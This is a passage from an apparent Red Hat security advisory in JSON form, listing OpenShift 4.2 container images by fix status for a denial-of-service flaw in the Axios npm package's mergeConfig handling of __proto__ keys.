"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
